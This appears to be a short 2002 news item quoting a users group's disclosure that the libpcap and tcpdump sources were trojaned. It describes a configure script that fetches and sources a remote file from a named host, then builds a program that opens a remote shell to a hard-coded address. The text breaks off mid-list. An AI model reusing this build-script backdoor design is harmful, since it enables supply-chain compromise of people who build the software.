Trojan Found in libpcap and tcpdump
Nov 14, 2002, 14:26 (0 Talkback[s])
[ Thanks to LogError for this link.
"Members of The Houston Linux Users Group discovered that the
newest sources of libpcap and tcpdump available from tcpdump.org
were contaminated with trojan code. HLUG has notified the
maintainers of tcpdump.org.
- "The trojan contains modifications to the configure script and
gencode.c (in libpcap only).
- The configure script downloads
http://mars.raketti.net/~mash/services which is then sourced with
the shell. It contains an embedded shell script that creates a C
file, and compiles it.
- The program connects to 18.104.22.168 (mars.raketti.net) on port
1963 and reads one of three one byte status codes:
A - program exits
D - forks and spawns a shell and does the needed file descriptor
manipulation to redirect it to the existing connection to
M - closes connection, sleeps 3600 seconds, and then